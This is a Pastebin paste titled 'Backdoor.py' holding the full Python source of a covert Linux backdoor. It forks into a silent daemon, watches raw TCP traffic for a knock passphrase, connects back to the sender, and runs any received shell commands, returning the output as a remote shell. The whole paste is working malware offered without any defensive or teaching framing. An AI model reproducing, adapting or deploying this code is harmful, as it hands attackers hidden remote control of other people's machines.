Advertisement
WhichHat

Backdoor.py

Mar 24th, 2017
518
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/python3
  2.  
  3. import socket
  4. import os
  5. import getpass
  6. import subprocess
  7. import platform
  8. import sys
  9. from struct import *
  10.  
  11.  
  12. def BackdoorGetSystemInfo(skt):
  13.     command = skt.recv(1024)
  14.     prompt = []
  15.     if type(command) == bytes:
  16.         command=command.decode("utf-8")
  17.     if command.strip() == "Report":
  18.         p = subprocess.Popen(['whoami'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
  19.         out, err = p.communicate()
  20.         user = out.strip().decode("utf-8")
  21.         prompt.append(user+"@")
  22.         prompt.append(platform.dist()[0]+":")
  23.         separator = "$"
  24.         if user == "root":
  25.             separator = "#"
  26.         prompt.append(separator)
  27.         prompt = "".join(prompt)
  28.         skt.send(str.encode(prompt))
  29.     command = skt.recv(1024)
  30.     if type(command) == bytes:
  31.         command=command.decode("utf-8")
  32.     if command.strip() == "Location":
  33.         proc = os.popen("pwd")
  34.         location = ""
  35.         for i in proc.readlines():
  36.             location += i
  37.         location = location.strip()
  38.         skt.send(str.encode(location))
  39.     return
  40.  
  41.  
  42. def BackdoorCmd(skt, command):
  43.  
  44.     try:
  45.         proc = os.popen(command) # counterpart : can't have any error message
  46.         output = ""
  47.         for i in proc.readlines():
  48.             output += i
  49.         output = output.strip()
  50.         if output == "":
  51.             output = "daemonnoreport" #send this to avoid troublesome padding
  52.         skt.send(str.encode(output))
  53.         # Equivalent using subprocess but has trouble with chained commands
  54.     except Exception as err:
  55.         print(err.args)
  56.         skt.send(str.encode("Error : command '"+command+"' not found"))
  57.  
  58.  
  59. def BackdoorSniffer():
  60.     skt = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_TCP)
  61.     while True:
  62.         pkt = skt.recvfrom(65535)
  63.         #packet string from tuple
  64.         pkt = pkt[0]
  65.         #take first 20 characters for the ip header
  66.         ipHeader = pkt[0:20]
  67.         #now unpack
  68.         iph = unpack('!BBHHHBBH4s4s' , ipHeader)
  69.         saddr = socket.inet_ntoa(iph[8])
  70.         daddr = socket.inet_ntoa(iph[9])
  71.         versionIhl = iph[0]
  72.         version = versionIhl >> 4
  73.         ihl = versionIhl & 0xF
  74.         iphLength = ihl*4
  75.         tcpHeader = pkt[iphLength:iphLength+20]
  76.         tcph = unpack('!HHLLBBHHH' , tcpHeader)
  77.         sport = tcph[0]
  78.         dport = tcph[1]
  79.         doffReserved = tcph[4]
  80.         tcphLength = doffReserved >> 4  
  81.         hSize = iphLength + tcphLength*4
  82.         dataSize = len(pkt) - hSize
  83.          
  84.         #get data from the packet
  85.         data = pkt[hSize:]
  86.         try:
  87.             if type(data) == bytes:
  88.                 data = data.decode("utf-8")
  89.             if data == "passphrase1":
  90.                 if type(saddr) == bytes:
  91.                     saddr = saddr.decode("utf-8")
  92.                 if type(sport) == bytes:
  93.                     sport = sport.decode("utf-8")
  94.                 return saddr, sport, daddr, dport
  95.         except:
  96.             pass
  97.  
  98. def BackdoorInit():
  99.  
  100.     skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  101.     daddr, dport, saddr, sport = BackdoorSniffer()
  102.     try:
  103.         skt.bind((saddr, sport))
  104.         skt.connect((daddr, dport))
  105.     except:
  106.         return None
  107.     command = skt.recv(1024)
  108.     if type(command)==bytes:
  109.         command=command.decode("utf-8")
  110.     if command.strip() == "passphrase2":
  111.         skt.send(b"passphrase3")
  112.        
  113.         return skt
  114.     else:
  115.         return None
  116.        
  117.  
  118. def BackdoorShell(skt):
  119.     while True:
  120.        
  121.         try:
  122.             command = skt.recv(1024)
  123.             if type(command)==bytes:
  124.                 command=command.decode("utf-8")
  125.             if command.strip().split()[0] == "cd":
  126.                 os.chdir(command.strip("cd "))
  127.                 BackdoorCmd(skt, "pwd")
  128.             elif command.strip().lower() == "exit":
  129.                 skt.send(b"exited")
  130.                 skt.close()
  131.                 break
  132.             elif command.strip().lower() == "release":
  133.                 skt.send(b"released")
  134.                 skt.close()
  135.                 return False
  136.             else:
  137.                 BackdoorCmd(skt, command)
  138.         except Exception:
  139.             skt.send(b"Error : An unexpected error has occurred.")
  140.        
  141.     return True
  142.  
  143.  
  144. def Backdoor():
  145.     while True:
  146.         skt = BackdoorInit()
  147.         if skt == None:
  148.             continue
  149.         BackdoorGetSystemInfo(skt)
  150.         if not BackdoorShell(skt):
  151.             break
  152.     return
  153.  
  154. def daemonize ():
  155.     stdin='/dev/null'
  156.     stdout='/dev/null'
  157.     stderr='/dev/null'
  158.     # Perform first fork.
  159.     try:
  160.         pid = os.fork()
  161.         if pid > 0:
  162.             sys.exit(0) # Exit first parent.
  163.     except OSError as e:
  164.         print(e.args)
  165.         sys.exit(1)
  166.     # Decouple from parent environment.
  167.     os.chdir("/")
  168.     os.umask(0)
  169.     os.setsid()
  170.     # Perform second fork.
  171.     try:
  172.         pid = os.fork( )
  173.         if pid > 0:
  174.             sys.exit(0) # Exit second parent.
  175.     except OSError as e:
  176.         print(e.args)
  177.         sys.exit(1)
  178.     # The process is now daemonized, redirect standard file descriptors.
  179.     for f in sys.stdout, sys.stderr:
  180.         f.flush( )
  181.     si = open(stdin, 'r')
  182.     so = open(stdout, 'a+')
  183.     se = open(stderr, 'a+')
  184.     os.dup2(si.fileno( ), sys.stdin.fileno( ))
  185.     os.dup2(so.fileno( ), sys.stdout.fileno( ))
  186.     os.dup2(se.fileno( ), sys.stderr.fileno( ))
  187.  
  188.     Backdoor()
  189.  
  190. daemonize()
Advertisement
RAW Paste Data Copied
Advertisement